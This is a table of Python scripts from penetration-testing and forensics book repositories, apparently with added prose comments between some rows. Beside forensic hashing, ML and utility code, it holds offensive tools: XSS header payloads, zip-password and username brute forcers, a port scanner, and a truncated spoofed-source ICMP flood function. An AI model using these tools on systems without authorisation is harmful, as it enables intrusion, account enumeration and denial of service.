repo_name | text | avg_line_length | max_line_length | alphnanum_fraction
---|---|---|---|---|
cybersecurity-penetration-testing | import requests
import sys
url = sys.argv[1]
payloads = ['<script>alert(1);</script>', '<scrscriptipt>alert(1);</scrscriptipt>', '<BODY ONLOAD=alert(1)>']
headers = {}
r = requests.head(url)
for payload in payloads:
for header in r.headers:
headers[header] = payload
req = requests.post(url, headers=headers)
| 27.636364 | 108 | 0.697452 |
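A natural extension of the header fuzzer above is to check whether each payload is reflected in the response body; a minimal sketch (the function name and timeout are illustrative, not from the original):

import requests

def reflects(url, header_name, payload):
    # Send one header at a time and report whether the payload comes back
    # in the response body -- a hint, not proof, of reflected XSS.
    resp = requests.post(url, headers={header_name: payload}, timeout=5)
    return payload in resp.text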
Mastering-Machine-Learning-for-Penetration-Testing | # Display "Hello, world!"
import tensorflow as tf
Message = tf.constant("Hello, world!")
sess = tf.Session()
print(sess.run(Message))
| 21.5 | 38 | 0.716418 |
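The snippet above targets the TensorFlow 1.x API; tf.Session was removed in TensorFlow 2.x, where eager execution evaluates tensors directly. A minimal equivalent, assuming TF 2.x is installed:

import tensorflow as tf

# Under eager execution no Session is needed; the tensor can be read directly.
message = tf.constant("Hello, world!")
print(message.numpy())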
Effective-Python-Penetration-Testing | import zipfile
filename = 'test.zip'
dictionary = 'passwordlist.txt'
password = None
file_to_open = zipfile.ZipFile(filename)
with open(dictionary, 'r') as f:
for line in f.readlines():
password = line.strip('\n')
        try:
            file_to_open.extractall(pwd=password)
            print 'Password found: %s' % password
            break
        except Exception:
            pass | 20.8125 | 45 | 0.698276 |
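On Python 3, ZipFile.extractall requires the pwd argument as bytes rather than str; a sketch of the same dictionary loop ported accordingly (function and variable names are illustrative):

import zipfile

def try_passwords(zip_path, wordlist_path):
    # Return the first password that extracts the archive, or None.
    zf = zipfile.ZipFile(zip_path)
    with open(wordlist_path) as f:
        for line in f:
            candidate = line.strip()
            try:
                zf.extractall(pwd=candidate.encode('utf-8'))
                return candidate
            except Exception:
                continue
    return None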
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: April 2015
tftp_download.py
Purpose: To run through a range of possible files and try and download them over TFTP.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
    import tftpy
except ImportError:
    sys.exit("[!] Install the package tftpy with: pip install tftpy")
def main():
ip = "192.168.195.165"
port = 69
tclient = tftpy.TftpClient(ip,port)
for inc in range(0,100):
filename = "example_router" + "-" + str(inc)
print("[*] Attempting to download %s from %s:%s") % (filename,ip,port)
try:
tclient.download(filename,filename)
        except Exception:
            print("[-] Failed to download %s from %s:%s" % (filename, ip, port))
if __name__ == '__main__':
main()
| 44.625 | 89 | 0.742348 |
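Only the filename pattern usually needs changing between targets; a hedged generalization of the download loop above, parameterizing the prefix and range (names are illustrative):

def guess_files(tclient, prefix="example_router", count=100):
    # tftpy raises an exception for a missing remote file, which we
    # treat as "not present" and skip.
    for inc in range(count):
        filename = "%s-%d" % (prefix, inc)
        try:
            tclient.download(filename, filename)
            print("[+] Retrieved %s" % filename)
        except Exception:
            pass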
Effective-Python-Penetration-Testing | # Importing required modules
import requests
from bs4 import BeautifulSoup
import urlparse
response = requests.get('http://www.freeimages.co.uk/galleries/food/breakfast/index.htm')
parse = BeautifulSoup(response.text, 'html.parser')
# Get all image tags
image_tags = parse.find_all('img')
# Get urls to the images
images = [ url.get('src') for url in image_tags]
# If no images found in the page
if not images:
sys.exit("Found No Images")
# Convert relative urls to absolute urls if any
images = [urlparse.urljoin(response.url, url) for url in images]
print 'Found %s images' % len(images)
# Download images to downloaded folder
for url in images:
r = requests.get(url)
    f = open('downloaded/%s' % url.split('/')[-1], 'wb')
f.write(r.content)
f.close()
print 'Downloaded %s' % url
| 24.28125 | 91 | 0.694307 |
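On Python 3 the same scraper needs urllib.parse instead of urlparse and binary file mode for the image bytes; a compact port (assuming a downloaded/ directory exists, as the original does):

import sys
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

response = requests.get('http://www.freeimages.co.uk/galleries/food/breakfast/index.htm')
parse = BeautifulSoup(response.text, 'html.parser')
images = [urljoin(response.url, img.get('src')) for img in parse.find_all('img')]
if not images:
    sys.exit("Found No Images")
for url in images:
    r = requests.get(url)
    # 'wb' preserves the binary image data.
    with open('downloaded/%s' % url.split('/')[-1], 'wb') as f:
        f.write(r.content)
    print('Downloaded %s' % url)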
cybersecurity-penetration-testing |
'''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Forensic File Processing, Hashing and Image Rendering
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 March 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
import time # Basic Time Module
import logging # Script Logging
import hashlib # Cryptographic Hashing
import argparse # Command Line Processing Module
# Import 3rd Party Modules
from PIL import Image
# End of Script Module Importing
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: Forensic Script Two SRC-2-2.py"
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_LOG = "./FORENSIC_LOG.txt"
# LOG Constants used as input to LogEvent Function
LOG_DEBUG = 0 # Debugging Event
LOG_INFO = 1 # Information Event
LOG_WARN = 2 # Warning Event
LOG_ERR = 3 # Error Event
LOG_CRIT = 4 # Critical Event
LOG_OVERWRITE = True # Set this constant to True if the SCRIPT_LOG
# should be overwritten, False if not
# End of Script Constants
# Initialize the Forensic Log
try:
# If LOG should be overwritten before
    # each run, then remove the old log
if LOG_OVERWRITE:
# Verify that the log exists before removing
if os.path.exists(SCRIPT_LOG):
os.remove(SCRIPT_LOG)
# Initialize the Log include the Level and message
logging.basicConfig(filename=SCRIPT_LOG, format='%(levelname)s\t:%(message)s', level=logging.DEBUG)
except:
print "Failed to initialize Logging"
quit()
# End of Forensic Log Initialization
# Script Functions
'''
If your script will contain functions, insert them
here, before the execution of the main script. This
will ensure that the functions will be callable from
anywhere in your script
'''
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calculate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
# Function: LogEvent()
#
# Logs the event message and specified type
# Input:
# eventType: LOG_INFO, LOG_WARN, LOG_ERR, LOG_CRIT or LOG_DEBUG
# eventMessage : string containing the message to be logged
def LogEvent(eventType, eventMessage):
if type(eventMessage) == str:
try:
timeStr = GetTime('UTC')
# Combine current Time with the eventMessage
# You can specify either 'UTC' or 'LOCAL'
# Based on the GetTime parameter
eventMessage = str(timeStr)+": "+eventMessage
if eventType == LOG_INFO:
logging.info(eventMessage)
elif eventType == LOG_DEBUG:
logging.debug(eventMessage)
elif eventType == LOG_WARN:
logging.warning(eventMessage)
elif eventType == LOG_ERR:
logging.error(eventMessage)
elif eventType == LOG_CRIT:
logging.critical(eventMessage)
else:
logging.info(eventMessage)
except:
print "Event Logging Failed"
else:
logging.warn('Received invalid event message')
# End LogEvent Function =========================
#
# Name: ParseCommandLine() Function
#
# Process and Validate the command line arguments
# using the Python Standard Library module argparse
#
# Input: none
#
# Return: validated filePath and hashType
# or generate a detailed error
def ParseCommandLine():
parser = argparse.ArgumentParser(SCRIPT_NAME)
parser.add_argument('-p', '--scanPath', type= ValPath, required=True, help="specifies the file path to scan")
    parser.add_argument('-t', '--hashType', type= ValHash, required=True, help="enter hashType MD5, SHA1, SHA224, SHA256, SHA384 or SHA512")
theArgs = parser.parse_args()
return theArgs.scanPath, theArgs.hashType
# End ParseCommandLine ============================
#
# Name: ValPath Function
#
# Function validates that a directory path
# exists and is readable. Used for argument validation only
#
# Input: a directory path string
#
# Returns the validated directory
# or raises command line errors
#
def ValPath(thePath):
# Validate the path is a directory
if not os.path.isdir(thePath):
raise argparse.ArgumentTypeError('Path does not exist')
# Validate the path is readable
if os.access(thePath, os.R_OK):
return thePath
else:
raise argparse.ArgumentTypeError('Path is not readable')
#End ValidateDirectory ===================================
#
# Name: ValHash Function
#
# Function validates the entered hash string
#
# Input: HashType
#
# Returns the validated hashType upper case
# or raises command line errors
#
def ValHash(theAlg):
theAlg = theAlg.upper()
if theAlg in ['MD5', 'SHA1', 'SHA224', 'SHA256', 'SHA384', 'SHA512']:
return theAlg
else:
raise argparse.ArgumentTypeError('Invalid Hash Type Specified')
#End ValHash ===============================
# End of Script Functions
# Script Classes
# Class: FileExaminer Class
#
# Desc: Handles basic File Based Examination
# Methods constructor: Initializes the Forensic File Object and Collects Basic Attributes
# File Size
# MAC Times
# Reads file into a buffer
# hashFile: Generates the selected one-way hash of the file
# destructor: Deletes the Forensic File Object
class FileExaminer:
# Constructor
def __init__(self, theFile):
#Attributes of the Object
self.lastError = "OK"
# Modified Access Create Time
        self.macTimes = ["", "", ""]
filename, self.fileExtension = os.path.splitext(theFile)
# File Status Data
self.filePath = theFile
self.mode = 0
self.fileSize = 0
self.fileType = "unknown"
self.uid = 0
self.gid = 0
self.mountPoint = False
self.fileRead = False
# Possible Hashes
self.md5 = ""
self.sha1 = ""
self.sha224 = ""
self.sha256 = ""
self.sha384 = ""
self.sha512 = ""
self.lastHash = ""
        # Image data (if the file is an image)
self.imageHeight = 0
self.imageWidth = 0
self.imageFormat = ''
self.imageFormatDesc = ''
self.imageExif = ''
try:
if os.path.exists(theFile):
# get the file statistics
theFileStat = os.stat(theFile)
# get the MAC Times and store them in a list
self.macTimes = []
self.macTimes.append(time.ctime(theFileStat.st_mtime))
self.macTimes.append(time.ctime(theFileStat.st_atime))
self.macTimes.append(time.ctime(theFileStat.st_ctime))
self.mode = theFileStat.st_mode
# get and store the File size
self.fileSize = theFileStat.st_size
# Get and store the ownership information
self.uid = theFileStat.st_uid
self.gid = theFileStat.st_gid
if os.path.isfile(theFile):
self.fileType = "File"
# Is this a real file?
elif os.path.islink(theFile):
self.fileType = "Link"
# Is This filename actually a directory?
elif os.path.isdir(theFile):
self.fileType = "Directory"
else:
self.fileType = "Unknown"
# Is the pathname a mount point?
if os.path.ismount(theFile):
self.mountPoint = True
else:
self.mountPoint = False
# Is the file Accessible for Read?
if os.access(theFile, os.R_OK) and self.fileType == "File":
# Open the file
fp = open(theFile, 'rb')
# Assume we have enough space
self.buffer = fp.read()
# Close the file we have the entire file in memory
fp.close()
self.fileRead = True
else:
self.fileRead = False
else:
self.lastError = "File does not exist"
except:
self.lastError = "File Exception Raised"
LogEvent(LOG_ERR, "File Examiner - Failed to Process File: " + theFile)
# Hash file method
def hashFile(self,hashType):
try:
if hashType == "MD5":
hashObj = hashlib.md5()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.md5 = self.lastHash
self.lastError = "OK"
return True
elif hashType == "SHA1":
hashObj = hashlib.sha1()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha1 = self.lastHash
self.lastError = "OK"
return True
if hashType == "SHA224":
hashObj = hashlib.sha224()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha224 = self.lastHash
self.lastError = "OK"
return True
elif hashType == "SHA256":
hashObj = hashlib.sha256()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha256 = self.lastHash
self.lastError = "OK"
return True
if hashType == "SHA384":
hashObj = hashlib.sha384()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha384 = self.lastHash
self.lastError = "OK"
return True
elif hashType == "SHA512":
hashObj = hashlib.sha512()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha512 = self.lastHash
self.lastError = "OK"
return True
else:
self.lastError = "Invalid Hash Type Specified"
return False
except:
self.lastError = "File Hash Failure"
LogEvent(LOG_ERR, "File Hashing - Failed to Hash File")
return False
def ExtractImageProperties(self):
try:
image = Image.open(self.filePath)
self.imageHeight = image.height
self.imageWidth = image.width
self.imageFormat = image.format
self.imageFormatDesc = image.format_description
if self.imageFormat == 'JPEG':
self.imageExif = image._getexif()
return True
except:
self.lastError = "Error Processing Image Data"
LogEvent(LOG_ERR, "Error Processing Image Data")
return False
def __del__(self):
print
# End Forensic File Class ====================================
# End of Script Classes
# Main Script Starts Here
#
# Script Overview
#
# The purpose of this script is to provide an example
# script that demonstrates and leverages key capabilities
# of Python that provide direct value to the
# forensic investigator.
# This script will perform the following:
#
# 1) Process the command line and obtain the filePath and hashType
# 2) The file names will be stored in a Python List object
# 3) For each file encountered, metadata will be extracted
#    and the file will be hashed with the selected algorithm;
#    the results will be written to the log file.
LogEvent(LOG_INFO, SCRIPT_NAME)
LogEvent(LOG_INFO, SCRIPT_VERSION)
LogEvent(LOG_INFO, "Script Started")
# Print Basic Script Information
print SCRIPT_NAME
print SCRIPT_VERSION
print SCRIPT_AUTHOR
utcTime = GetTime()
print "Script Started: ", utcTime
print
#
# STEP One:
# Parse the Command Line Arguments
#
thePath, theAlg = ParseCommandLine()
print "Path Selected: ", thePath
LogEvent(LOG_INFO, "Path Selected: "+thePath)
print "Algorithm Selected:", theAlg
LogEvent(LOG_INFO,"Algorithm Selected: "+ theAlg)
#
# Step Two extract a list of filenames
# from the path specified
#
listOfFiles = os.listdir(thePath)
#
# Step Three Extract the basic metadata and
# specified file hash of the each file
# using the FileExaminer Class
#
for eachFile in listOfFiles:
    # Utilize a try/except block in case we encounter
    # errors during file processing
try:
# join the path and file name
fullPath = os.path.join(thePath, eachFile)
# create a file examiner object
feObj = FileExaminer(fullPath)
# generate the specified hash
if feObj.hashFile(theAlg):
print "Hashing Success"
else:
print "Hashing Failed"
# Extract image properties if file is an image
if feObj.ExtractImageProperties():
imageData = True
print "Image Properties Extracted"
else:
imageData = False
print "Image Property Extraction Failed"
LogEvent(LOG_INFO, "============================================")
LogEvent(LOG_INFO, "File Processed: "+ fullPath)
LogEvent(LOG_INFO, "File Extension: "+ feObj.fileExtension)
LogEvent(LOG_INFO, "File Modified: "+ feObj.macTimes[0])
LogEvent(LOG_INFO, "File Accessed: "+ feObj.macTimes[1])
LogEvent(LOG_INFO, "File Created: "+ feObj.macTimes[2])
LogEvent(LOG_INFO, "File Size: "+ str(feObj.fileSize))
LogEvent(LOG_INFO, "File Hash: "+ theAlg + ":" + feObj.lastHash)
LogEvent(LOG_INFO, "File Owner: "+ str(feObj.uid))
LogEvent(LOG_INFO, "File Group: "+ str(feObj.gid))
LogEvent(LOG_INFO, "File Mode: "+ bin(feObj.mode))
if imageData:
LogEvent(LOG_INFO, "Image Format: "+ feObj.imageFormat)
LogEvent(LOG_INFO, "Image Format Desc "+ feObj.imageFormatDesc)
LogEvent(LOG_INFO, "Image Width Pixels: "+ str(feObj.imageWidth))
LogEvent(LOG_INFO, "Image Height Pixels: "+ str(feObj.imageHeight))
print "=================================================="
print "File Processed: ", fullPath
print "File Ext: ", feObj.fileExtension
print "MAC Times: ", feObj.macTimes
print "File Size: ", feObj.fileSize
print "File Hash: ", theAlg, feObj.lastHash
print "File Owner: ", feObj.uid
print "File Group: ", feObj.gid
print "File Mode: ", bin(feObj.mode)
print
if imageData:
print "Image Properties"
print "Image Format: ", feObj.imageFormat
print "Image Format Desc ", feObj.imageFormatDesc
print "Image Width Pixels: ", feObj.imageWidth
print "Image Height Pixels: ", feObj.imageHeight
if feObj.imageFormat == "JPEG":
print "Exif Raw Data: ", feObj.imageExif
except:
print "File Processing Error: ", fullPath
LogEvent(LOG_INFO, "File Processing Error: "+ fullPath)
print
print "Files Processing Completed"
LogEvent(LOG_INFO, "Script End")
utcTime = GetTime('UTC')
print "Script Ended: ", utcTime
# End of Script Main
| 30.707106 | 143 | 0.55111 |
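Given the argparse definition in ParseCommandLine(), a typical invocation of the script above looks like this (the evidence path is illustrative):

python SRC-2-2.py -p ./evidence -t SHA256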
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Simple script for making "Copy as curl command" output in system's clipboard a little nicer.
# To use it:
# - firstly right click on request in BurpSuite
# - select "Copy as curl command"
# - then launch this script.
# As a result, you'll have a bit nicer curl command in your clipboard.
#
try:
import xerox
except ImportError:
raise ImportError, "`xerox` library not found. Install it using: `pip install xerox`"
import re
data = xerox.paste()
data = re.sub(r"\s+\\\n\s+", ' ', data, re.M)
data = re.sub('curl -i -s -k\s+-X', 'curl -iskX', data)
if "-iskX 'GET'" in data:
data = data.replace("-iskX 'GET'", '')
else:
data = re.sub(r"-iskX '([^']+)' ", r"-iskX \1 ", data)
superfluous_headers = {
'Upgrade-Insecure-Requests':'',
'DNT':'',
'User-Agent':'',
'Content-Type':"application/x-www-form-urlencoded",
'Referer':'',
}
for k, v in superfluous_headers.items():
val = v
if not val:
val = "[^']+"
rex = r" -H '" + k + ": " + val + "' "
m = re.search(rex, data)
if m:
data = re.sub(rex, ' ', data)
data = re.sub(r"'(http[^']+)'$", r'"\1"', data)
xerox.copy(data) | 24.272727 | 94 | 0.612961 |
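As an illustration of the rewrites above, a clipboard entry such as

curl -i -s -k  -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'DNT: 1' 'http://target/login'

comes back roughly as

curl -iskX POST "http://target/login"

with the method unquoted, the noise headers stripped, and the URL double-quoted (exact whitespace depends on the original Burp output).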
Python-Penetration-Testing-for-Developers | import threading
import time
import socket, subprocess,sys
from datetime import datetime
import thread
import shelve
'''section 1 '''
subprocess.call('clear',shell=True)
shelf = shelve.open("mohit.raj")
data = shelf['desc']
shelf.close()   # the port-description dict is in memory now; close the shelf early
'''section 2 '''
class myThread (threading.Thread):
def __init__(self, threadName,rmip,r1,r2,c):
threading.Thread.__init__(self)
self.threadName = threadName
self.rmip = rmip
self.r1 = r1
self.r2 = r2
self.c =c
def run(self):
scantcp(self.threadName,self.rmip,self.r1,self.r2,self.c)
'''section 3 '''
def scantcp(threadName,rmip,r1,r2,c):
try:
for port in range(r1,r2):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#sock= socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
socket.setdefaulttimeout(c)
result = sock.connect_ex((rmip,port))
if result==0:
print "Port Open:---->\t", port,"--", data.get(port, "Not in Database")
sock.close()
except KeyboardInterrupt:
print "You stop this "
sys.exit()
except socket.gaierror:
print "Hostname could not be resolved"
sys.exit()
except socket.error:
print "could not connect to server"
sys.exit()
'''section 4 '''
print "*"*60
print " \tWelcome this is the Port scanner of Mohit\n "
d=raw_input("\t Press D for Domain Name or Press I for IP Address\t")
if (d=='D' or d=='d'):
rmserver = raw_input("\t Enter the Domain Name to scan:\t")
rmip = socket.gethostbyname(rmserver)
elif(d=='I' or d=='i'):
rmip = raw_input("\t Enter the IP Address to scan: ")
else:
print "Wrong input"
#rmip = socket.gethostbyname(rmserver)
r11 = int(raw_input("\t Enter the start port number\t"))
r21 = int (raw_input("\t Enter the last port number\t"))
conect=raw_input("For low connectivity press L and for high connectivity press H\t")
if (conect=='L' or conect=='l'):
c =1.5
elif(conect =='H' or conect=='h'):
c=0.5
else:
print "\t wrong Input"
print "\n Mohit's Scanner is working on ",rmip
print "*"*60
t1= datetime.now()
tp=r21-r11
tn =30
# tn number of port handled by one thread
tnum=tp/tn # tnum number of threads
if (tp%tn != 0):
tnum= tnum+1
if (tnum > 300):
tn = tp/300
tn= tn+1
tnum=tp/tn
if (tp%tn != 0):
tnum= tnum+1
'''section 5'''
threads= []
try:
for i in range(tnum):
#print "i is ",i
k=i
r2=r11+tn
# thread=str(i)
thread = myThread("T1",rmip,r11,r2,c)
thread.start()
threads.append(thread)
r11=r2
except:
print "Error: unable to start thread"
print "\t Number of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total
print "\n*****Thanks for using Mohit's Port Scanner****"
print "You can update database file"
print "use command python > python updata.py"
print "Give feedback to mohitraj.cs@gmail.com"
| 23.160305 | 87 | 0.604298 |
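The scanner above expects a shelve database named mohit.raj whose 'desc' entry maps port numbers to service descriptions; the book's updata.py builds it, but a minimal stand-in looks like this (the port list is illustrative):

import shelve

desc = {21: "FTP", 22: "SSH", 23: "Telnet", 80: "HTTP", 443: "HTTPS"}
shelf = shelve.open("mohit.raj")
shelf['desc'] = desc
shelf.close()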
owtf | """
GREP Plugin for Testing for application configuration management (OWASP-CM-004) <- looks for HTML Comments
https://www.owasp.org/index.php/Testing_for_application_configuration_management_%28OWASP-CM-004%29
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for comments"
def run(PluginInfo):
regexes = [
"RESPONSE_REGEXP_FOR_HTML_COMMENTS",
"RESPONSE_REGEXP_FOR_CSS_JS_COMMENTS",
"RESPONSE_REGEXP_FOR_JS_COMMENTS",
"RESPONSE_REGEXP_FOR_PHP_SOURCE",
"RESPONSE_REGEXP_FOR_ASP_SOURCE",
]
Content = plugin_helper.FindResponseBodyMatchesForRegexpNames(regexes)
return Content
| 35.428571 | 106 | 0.734293 |
cybersecurity-penetration-testing | #brute force username enumeration
import sys
import urllib
import urllib2
if len(sys.argv) !=2:
print "usage: %s filename" % (sys.argv[0])
sys.exit(0)
filename=str(sys.argv[1])
userlist = open(filename,'r')
url = "http://www.vulnerablesite.com/forgotpassword.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
user=user.rstrip()
data = urllib.urlencode({"username":user})
request = urllib2.urlopen(url,data)
response = request.read()
    if response.find(UnknownStr) < 0:
        foundusers.append(user)
request.close()
if len(foundusers)>0:
print "Found Users:\n"
for name in foundusers:
print name+"\n"
else:
print "No users found\n"
| 19.484848 | 57 | 0.712593 |
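A Python 3 port of the request loop above would swap urllib/urllib2 for requests; a minimal sketch (function name and timeout are illustrative):

import requests

def check_user(url, user, unknown_str="Username not found"):
    # True when the error marker is absent, i.e. the username
    # appears to exist behind the password-reset form.
    resp = requests.post(url, data={"username": user}, timeout=5)
    return unknown_str not in resp.text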
cybersecurity-penetration-testing | '''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Python Template for MPE+ Integration
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 April 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
from sys import argv # The systems argument vector, in Python this is
# a list of elements from the command line
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: MPE+ Command Line Arguments"
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_RELEASE = "April 2016"
# Print out some basics
print(SCRIPT_NAME)
print(SCRIPT_AUTHOR)
print(SCRIPT_VERSION, SCRIPT_RELEASE)
# Obtain the command line arguments using
# the system argument vector
# For MPE+ Scripts the length of the argument vector is
# always 2 scriptName, path
if len(argv) == 2:
scriptName, path = argv
else:
print(argv, "Invalid Command line")
quit()
print("Command Line Argument Vector")
print("Script Name: ", scriptName)
print("Script Path: ", path)
# Verify the path exists and determine
# the path type
if os.path.exists(path):
print("Path Exists")
if os.path.isdir(path):
print("Path is a directory")
elif os.path.isfile(path):
print("Path is a file")
else:
print(path, "is invalid")
else:
print(path, "Does not exist")
print ("Script Complete") | 28.141026 | 103 | 0.702905 |
Python-Penetration-Testing-for-Developers | import subprocess
import sys
ipfile = sys.argv[1]
IPs = open(ipfile, "r")
output = open("sslscan.csv", "w+")
for IP in IPs:
    try:
        IP = IP.strip()  # drop the trailing newline so each CSV row stays on one line
        command = "sslscan " + IP
ciphers = subprocess.check_output(command.split())
for line in ciphers.splitlines():
if "Accepted" in line:
output.write(IP+","+line.split()[1]+","+line.split()[4]+","+line.split()[2]+"\r")
except:
pass | 18.947368 | 85 | 0.632275 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Mastering-Machine-Learning-for-Penetration-Testing | import pandas as pd
import yellowbrick as yb
from sklearn.model_selection import train_test_split
from sklearn import preprocessing
from sklearn.ensemble import RandomForestClassifier
Columns = ["duration","protocol_type","service","flag","src_bytes",
"dst_bytes","land","wrong_fragment","urgent","hot","num_failed_logins",
"logged_in","num_compromised","root_shell","su_attempted","num_root",
"num_file_creations","num_shells","num_access_files","num_outbound_cmds",
"is_host_login","is_guest_login","count","srv_count","serror_rate",
"srv_serror_rate","rerror_rate","srv_rerror_rate","same_srv_rate",
"diff_srv_rate","srv_diff_host_rate","dst_host_count","dst_host_srv_count",
"dst_host_same_srv_rate","dst_host_diff_srv_rate","dst_host_same_src_port_rate",
"dst_host_srv_diff_host_rate","dst_host_serror_rate","dst_host_srv_serror_rate",
"dst_host_rerror_rate","dst_host_srv_rerror_rate","label","difficulty"]
Data = pd.read_csv("KDDTrain+.csv", header=None, names = Columns)
Data.protocol_type = preprocessing.LabelEncoder().fit_transform(Data["protocol_type"])
Data.service = preprocessing.LabelEncoder().fit_transform(Data["service"])
Data.flag = preprocessing.LabelEncoder().fit_transform(Data["flag"])
Data.label = preprocessing.LabelEncoder().fit_transform(Data["label"])
# Exclude the label and difficulty columns from the feature matrix
X = Data.drop(["label", "difficulty"], axis=1).values
y = Data.label.values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
clf = RandomForestClassifier(max_depth=2, random_state=0)
clf.fit(X_train, y_train)  # train on the training split only, so the test score is meaningful
Score = clf.score(X_test,y_test)
print(Score*100)
| 42 | 86 | 0.720147 |
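A single accuracy number hides per-class behaviour; printing a classification report on the held-out split is a natural next step (a short sketch reusing the variables above):

from sklearn.metrics import classification_report

predictions = clf.predict(X_test)
print(classification_report(y_test, predictions))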
Python-Penetration-Testing-for-Developers | import socket
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port =12347
s.connect((host,port))
msg= s.recv(1024)
print msg
print struct.unpack('hhl',msg)
s.close() | 19.8 | 53 | 0.729469 |
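The client above assumes the peer sends a struct-packed 'hhl' record (two shorts and a native long); a minimal matching server sketch, with illustrative values:

import socket
import struct

serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind(("0.0.0.0", 12347))
serv.listen(1)
conn, addr = serv.accept()
# Pack two shorts and a long in native byte order, mirroring the
# client's struct.unpack('hhl', msg).
conn.send(struct.pack('hhl', 1, 2, 3))
conn.close()
serv.close()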
Mastering-Machine-Learning-for-Penetration-Testing | import pandas as pd
import numpy as np
data = np.array(['p','a','c','k','t'])
SR = pd.Series(data)
print SR
| 17.166667 | 38 | 0.62963 |
owtf | """
owtf.utils.commands
~~~~~~~~~~~~~~~~~~~
"""
import os
def get_command(argv):
"""Format command to remove directory and space-separated arguments.
:params list argv: Arguments for the CLI.
:return: Arguments without directory and space-separated arguments.
:rtype: list
"""
return " ".join(argv).replace(argv[0], os.path.basename(argv[0]))
| 17.75 | 72 | 0.644385 |
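For example (the argv is illustrative):

get_command(["/usr/bin/nmap", "-sV", "127.0.0.1"])   # -> 'nmap -sV 127.0.0.1', directory stripped from the executable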
cybersecurity-penetration-testing | import optparse
from scapy.all import *
from random import randint
def ddosTest(src, dst, iface, count):
pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/Raw(load='1234')
send(pkt, iface=iface, count=count)
